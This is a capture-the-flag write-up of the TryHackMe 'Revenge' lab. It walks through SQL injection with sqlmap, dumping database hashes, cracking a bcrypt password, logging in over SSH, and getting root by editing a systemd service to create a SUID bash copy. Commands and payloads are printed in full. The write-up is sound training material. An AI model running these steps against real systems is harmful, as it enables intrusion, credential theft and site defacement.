Revenge TryHackMe Write Up

8 minute read

1

Room Link : https://tryhackme.com/room/revenge

Revenge is a medium rated tryhackme room created by Nameless0ne. App.py was found after running gobuster which revealed a route which was vulnerable to sql injection. Username and password hashes are obtained after running SQLMap and a hash for server-admin was cracked using hashcat which was used to login to the box using ssh. On the box, sudoers entries were used to get a root shell.

Message From Billy Joel

To whom it may concern,

I know it was you who hacked my blog.  I was really impressed with your skills.  You were a little sloppy 
and left a bit of a footprint so I was able to track you down.  But, thank you for taking me up on my offer.  
I've done some initial enumeration of the site because I know *some* things about hacking but not enough.  
For that reason, I'll let you do your own enumeration and checking.

What I want you to do is simple.  Break into the server that's running the website and deface the front page.  
I don't care how you do it, just do it.  But remember...DO NOT BRING DOWN THE SITE!  We don't want to cause irreparable damage.

When you finish the job, you'll get the rest of your payment.  We agreed upon $5,000.  
Half up-front and half when you finish.

Good luck,

Billy

Our goal is to deface the front page.

Port Scan

[email protected]:~/Documents/tryhackme/revenge$ nmap -sC -sV -oN initial 10.10.178.180
Increasing send delay for 10.10.178.180 from 5 to 10 due to 27 out of 89 dropped probes since last increase.
Nmap scan report for 10.10.178.180
Host is up (0.42s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72:53:b7:7a:eb:ab:22:70:1c:f7:3c:7a:c7:76:d9:89 (RSA)
|   256 43:77:00:fb:da:42:02:58:52:12:7d:cd:4e:52:4f:c3 (ECDSA)
|_  256 2b:57:13:7c:c8:4f:1d:c2:68:67:28:3f:8e:39:30:ab (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: E859DC70A208F0F0242640410296E06A
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Home | Rubber Ducky Inc.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80

Running gobuster

[email protected]:~/Documents/tryhackme/revenge$ gobuster dir -u http://10.10.178.180/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,py  
/products (Status: 200)
/index (Status: 200)
/contact (Status: 200)
/login (Status: 200)
/static (Status: 301)
/admin (Status: 200)
/app.py (Status: 200)
/requirements.txt (Status: 200)

Contents of app.py

from flask import Flask, render_template, request, flash
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import create_engine
from flask_bcrypt import Bcrypt

app = Flask(__name__)

app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:[email protected]/duckyinc'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False

db = SQLAlchemy(app)
bcrypt = Bcrypt(app)


app.secret_key = b'_5#y2L"F4Q8z\n\xec]/'
eng = create_engine('mysql+pymysql://root:[email protected]/duckyinc')


# Main Index Route
@app.route('/', methods=['GET'])
@app.route('/index', methods=['GET'])
def index():
    return render_template('index.html', title='Home')


# Contact Route
@app.route('/contact', methods=['GET', 'POST'])
def contact():
    if request.method == 'POST':
        flash('Thank you for reaching out.  Someone will be in touch shortly.')
        return render_template('contact.html', title='Contact')

    elif request.method == 'GET':
        return render_template('contact.html', title='Contact')


# Products Route
@app.route('/products', methods=['GET'])
def products():
    return render_template('products.html', title='Our Products')


# Product Route
# SQL Query performed here
@app.route('/products/<product_id>', methods=['GET'])
def product(product_id):
    with eng.connect() as con:
        # Executes the SQL Query
        # This should be the vulnerable portion of the application
        rs = con.execute(f"SELECT * FROM product WHERE id={product_id}")
        product_selected = rs.fetchone()  # Returns the entire row in a list
    return render_template('product.html', title=product_selected[1], result=product_selected)


# Login
@app.route('/login', methods=['GET'])
def login():
    if request.method == 'GET':
        return render_template('login.html', title='Customer Login')


# Admin login
@app.route('/admin', methods=['GET'])
def admin():
    if request.method == 'GET':
        return render_template('admin.html', title='Admin Login')


# Page Not found error handler
@app.errorhandler(404)
def page_not_found(e):
    return render_template('404.html', error=e), 404


@app.errorhandler(500)
def internal_server_error(e):
    return render_template('500.html', error=e), 500


if __name__ == "__main__":
    app.run('0.0.0.0')

Route to /products/<product_id> is vulnerable to sql injection as the untrusted data <product_id> is directly passed to the sql query.

Running SQLMap

[email protected]:~/Documents/tryhackme/revenge$ /opt/sqlmap-dev/sqlmap.py -u "http://10.10.185.226/products/1*" --batch --risk 3 --level 5 
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.7.12#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 129 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://10.10.185.226:80/products/1 AND 9559=9559

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://10.10.185.226:80/products/1 AND (SELECT 2184 FROM (SELECT(SLEEP(5)))HTWi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: http://10.10.185.226:80/products/-1156 UNION ALL SELECT 57,57,57,57,57,57,57,CONCAT(0x717a707171,0x484a48557870456e7a656d62507177746950644b5a56736c42544b7179484d466a59757247554872,0x7176707871)-- -
---
[22:18:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.12
[22:18:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 92 times, 405 (Method Not Allowed) - 1 times

Enumeration databases

[email protected]:~/Documents/tryhackme/revenge$ /opt/sqlmap-dev/sqlmap.py -u "http://10.10.185.226/products/1*" --batch --risk 3 --level 5 --dbs
available databases [5]:                                                                                                                                                        
[*] duckyinc
[*] information_schema                  
[*] mysql                
[*] performance_schema   
[*] sys 

Database duckyinc looks interesing.

Enumerating tables

[email protected]:~/Documents/tryhackme/revenge$ /opt/sqlmap-dev/sqlmap.py -u "http://10.10.185.226/products/1*" --batch --risk 3 --level 5 -D duckyinc --tables
Database: duckyinc                                                                                                                                                              
[3 tables]                                                                                                                                                                      
+-------------+
| system_user |
| user        |                         
| product     |          
+-------------+ 

Dumping all data from a database

[email protected]:~/Documents/tryhackme/revenge$ /opt/sqlmap-dev/sqlmap.py -u "http://10.10.185.226/products/1*" --batch --risk 3 --level 5 -D duckyinc --dump
Database: duckyinc                                                                                                                                                              
Table: system_user                                                                                                                                                              
[3 entries]                                                                                                                                                                     
+------+----------------------+--------------+--------------------------------------------------------------+                                                                   
| id   | email                | username     | _password                                                    |                                                                   
+------+----------------------+--------------+--------------------------------------------------------------+                                                                   
| 1    | [email protected]  | server-admin | $2a$08$GPh7KZcK2kNIQEm5byBj1umCQ79xP.zQe19hPoG/w2GoebUtPfT8a |                                                                   
| 2    | [email protected] | kmotley      | $2a$12$LEENY/LWOfyxyCBUlfX8Mu8viV9mGUse97L8x.4L66e9xwzzHfsQa |                                                                   
| 3    | [email protected] | dhughes      | $2a$12$22xS/uDxuIsPqrRcxtVmi.GR2/xh0xITGdHuubRF4Iilg5ENAFlcK |                                                                   
+------+----------------------+--------------+--------------------------------------------------------------+  

Database: duckyinc                                                                                                                                                             
Table: user
[10 entries]
+------+---------------------------------+------------------+----------+----------------------------+--------------------------------------------------------------+
| id   | email                           | company          | username | credit_card                | _password                                                    |
+------+---------------------------------+------------------+----------+----------------------------+--------------------------------------------------------------+
| 1    | [email protected]               | Fake Inc         | jhenry   | 4338736490565706           | $2a$12$dAV7fq4KIUyUEOALi8P2dOuXRj5ptOoeRtYLHS85vd/SBDv.tYXOa |
| 2    | [email protected]       | Evil Corp        | smonroe  | 355219744086163            | $2a$12$6KhFSANS9cF6riOw5C66nerchvkU9AHLVk7I8fKmBkh6P/rPGmanm |
| 3    | [email protected] | McDoonalds Inc   | dross    | 349789518019219            | $2a$12$9VmMpa8FufYHT1KNvjB1HuQm9LF8EX.KkDwh9VRDb5hMk3eXNRC4C |
| 4    | [email protected]                   | ABC Corp         | ngross   | 4499108649937274           | $2a$12$LMWOgC37PCtG7BrcbZpddOGquZPyrRBo5XjQUIVVAlIKFHMysV9EO |
| 5    | [email protected]            | Three Below      | jlawlor  | 4563593127115348           | $2a$12$hEg5iGFZSsec643AOjV5zellkzprMQxgdh1grCW3SMG9qV9CKzyRu |
| 6    | [email protected]                   | Krasco Org       | mandrews | thm{br***1ng_4nd_******} | $2a$12$reNFrUWe4taGXZNdHAhRme6UR2uX..t/XCR6UnzTK6sh1UhREd1rC |
| 7    | [email protected]          | Wally World Corp | dgorman  | 4905698211632780           | $2a$12$8IlMgC9UoN0mUmdrS3b3KO0gLexfZ1WvA86San/YRODIbC8UGinNm |
| 8    | [email protected]            | Orlando City     | mbutts   | 4690248976187759           | $2a$12$dmdKBc/0yxD9h81ziGHW4e5cYhsAiU4nCADuN0tCE8PaEv51oHWbS |
| 9    | [email protected]             | Dolla Twee       | hmontana | 375019041714434            | $2a$12$q6Ba.wuGpch1SnZvEJ1JDethQaMwUyTHkR0pNtyTW6anur.3.0cem |
| 10   | [email protected]                | O!  Fam Dollar   | csmith   | 364774395134471            | $2a$12$gxC7HlIWxMKTLGexTq8cn.nNnUaYKUpI91QaqQ/E29vtwlwyvXe36 |
+------+---------------------------------+------------------+----------+----------------------------+--------------------------------------------------------------+

We got our first flag.

Obtained usernames and hashes

smonroe:$2a$12$6KhFSANS9cF6riOw5C66nerchvkU9AHLVk7I8fKmBkh6P/rPGmanm
dross:$2a$12$9VmMpa8FufYHT1KNvjB1HuQm9LF8EX.KkDwh9VRDb5hMk3eXNRC4C
ngross:$2a$12$LMWOgC37PCtG7BrcbZpddOGquZPyrRBo5XjQUIVVAlIKFHMysV9EO
jlawlor:$2a$12$hEg5iGFZSsec643AOjV5zellkzprMQxgdh1grCW3SMG9qV9CKzyRu
mandrews:$2a$12$reNFrUWe4taGXZNdHAhRme6UR2uX..t/XCR6UnzTK6sh1UhREd1rC
dgorman:$2a$12$8IlMgC9UoN0mUmdrS3b3KO0gLexfZ1WvA86San/YRODIbC8UGinNm
mbutts:$2a$12$dmdKBc/0yxD9h81ziGHW4e5cYhsAiU4nCADuN0tCE8PaEv51oHWbS
hmontana:$2a$12$q6Ba.wuGpch1SnZvEJ1JDethQaMwUyTHkR0pNtyTW6anur.3.0cem
csmith:$2a$12$gxC7HlIWxMKTLGexTq8cn.nNnUaYKUpI91QaqQ/E29vtwlwyvXe36
server-admin:$2a$08$GPh7KZcK2kNIQEm5byBj1umCQ79xP.zQe19hPoG/w2GoebUtPfT8a
kmotley:$2a$12$LEENY/LWOfyxyCBUlfX8Mu8viV9mGUse97L8x.4L66e9xwzzHfsQa
dhughes:$2a$12$22xS/uDxuIsPqrRcxtVmi.GR2/xh0xITGdHuubRF4Iilg5ENAFlcK

Hashes starting with $2a$12$ takes a lot of time to crack and there is one hash that is unique that is starting with $2a$08$.

Cracking hash with hashcat

[email protected]:~/Documents/tryhackme/revenge$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt --user
hashcat (v5.1.0) starting...
                                                                                        
* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.                                                                                                                         To disable the timeout, see: https://hashcat.net/q/timeoutpatch                                                                                                    
nvmlDeviceGetFanSpeed(): Not Supported
                                                                                        
OpenCL Platform #1: NVIDIA Corporation
======================================
$2a$08$GPh7KZcK2kNIQEm5byBj1umCQ79xP.zQe19hPoG/w2GoebUtPfT8a:inuyasha
                                                                                        
Session..........: hashcat       
Status...........: Cracked       
Hash.Type........: bcrypt $2*$, Blowfish (Unix)                                                                                                                                 
Hash.Target......: $2a$08$GPh7KZcK2kNIQEm5byBj1umCQ79xP.zQe19hPoG/w2Go...tPfT8a         
Time.Started.....: Sat Oct 17 22:28:12 2020 (3 secs)                        
Time.Estimated...: Sat Oct 17 22:28:15 2020 (0 secs)                           
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)                                                                                                                      
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       83 H/s (4.36ms) @ Accel:4 Loops:1 Thr:8 Vec:1                  
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 288/14344385 (0.00%)                                                 
Rejected.........: 0/288 (0.00%)                                                        
Restore.Point....: 192/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:255-256                               
Candidates.#1....: alyssa -> brenda   
Hardware.Mon.#1..: Temp: 49c Util: 92% Core:1176MHz Mem: 900MHz Bus:4    
server-admin:inuyasha

Logging as user server-admin

[email protected]:~/Documents/tryhackme/revenge$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0


8 packages can be updated.
0 updates are security updates.


################################################################################
#                        Ducky Inc. Web Server 00080012                        #
#            This server is for authorized Ducky Inc. employees only           #
#                  All actiions are being monitored and recorded               #
#                    IP and MAC addresses have been logged                     #
################################################################################
Last login: Wed Aug 12 20:09:36 2020 from 192.168.86.65
[email protected]:~$

Reading second flag

[email protected]:~$ ls
flag2.txt
[email protected]:~$ cat flag2.txt 
thm{4***t_t***e}

Privilege Escalation

Sudo -l

[email protected]:~$ sudo -l
[sudo] password for server-admin: 
Matching Defaults entries for server-admin on duckyinc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User server-admin may run the following commands on duckyinc:
    (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit
        /etc/systemd/system/duckyinc.service

Looks like we can change the configuration file for service duckyinc and reload the daemon after changing the file and can enable and restart the service as root. So, lets try and get a shell as root.

Shell.sh

[email protected]:~$ cat shell.sh 
#!/bin/bash

cp /bin/bash /tmp/bash && chmod 4755 /tmp/bash
[email protected]:~$ pwd
/home/server-admin
[email protected]:~$ chmod +x shell.sh 

We create a file called shell.sh on folder /home/server-admin which we will execute when the duckyinc service restarts.

Changing the file /etc/systemd/system/duckyinc.service

Current content of file

[email protected]:~$ cat /etc/systemd/system/duckyinc.service 
[Unit]
Description=Gunicorn instance to serve DuckyInc Webapp
After=network.target

[Service]
User=flask-app
Group=www-data
WorkingDirectory=/var/www/duckyinc
ExecStart=/usr/local/bin/gunicorn --workers 3 --bind=unix:/var/www/duckyinc/duckyinc.sock --timeout 60 -m 007 app:app
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s TERM $MAINPID

[Install]
WantedBy=multi-user.target

Changed content

[email protected]:~$ sudoedit /etc/systemd/system/duckyinc.service
[email protected]:~$ cat /etc/systemd/system/duckyinc.service
[Unit]
Description=Gunicorn instance to serve DuckyInc Webapp
After=network.target

[Service]
User=root
Group=root
WorkingDirectory=/var/www/duckyinc
ExecStart=/bin/bash /home/server-admin/shell.sh
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s TERM $MAINPID

[Install]
WantedBy=multi-user.target

Restating the service

[email protected]:~$ sudo /bin/systemctl daemon-reload
[email protected]:~$ sudo /bin/systemctl enable duckyinc.service
[email protected]:~$ sudo /bin/systemctl restart duckyinc.service

Checking /tmp/

[email protected]:~$ ls -la /tmp/bash
-rwsr-xr-x 1 root root 1113504 Oct 17 16:55 /tmp/bash

And the file is created with SUID bit set.

Getting a root shell

[email protected]:~$ /tmp/bash -p
bash-4.4# id
uid=1001(server-admin) gid=1001(server-admin) euid=0(root) groups=1001(server-admin),33(www-data)

And we are now root on the box.

Getting the final flag

bash-4.4# ls -la /root
total 52
drwx------  7 root root 4096 Aug 28 03:10 .
drwxr-xr-x 24 root root 4096 Aug  9 15:17 ..
drwxr-xr-x  2 root root 4096 Aug 12 18:46 .bash_completion.d
lrwxrwxrwx  1 root root    9 Aug 10 12:54 .bash_history -> /dev/null
-rw-r--r--  1 root root 3227 Aug 12 18:46 .bashrc
drwx------  3 root root 4096 Aug  9 16:15 .cache
drwx------  3 root root 4096 Aug  9 15:31 .gnupg
drwxr-xr-x  5 root root 4096 Aug 12 18:44 .local
-rw-------  1 root root  485 Aug 10 00:44 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Aug 10 13:21 .selected_editor
drwx------  2 root root 4096 Aug  9 15:29 .ssh
-rw-------  1 root root 7763 Aug 12 18:57 .viminfo

There was no final flag on the ususal place.

Our goal was to deface the website so lets change the content of the homepage.

Changing index.html

bash-4.4# mv /var/www/duckyinc/templates/index.html /dev/shm/

And now if we check the /root, we have a new file.

bash-4.4# ls
flag3.txt

Reading the final flag

bash-4.4# cat flag3.txt 
thm{m******n_ac********}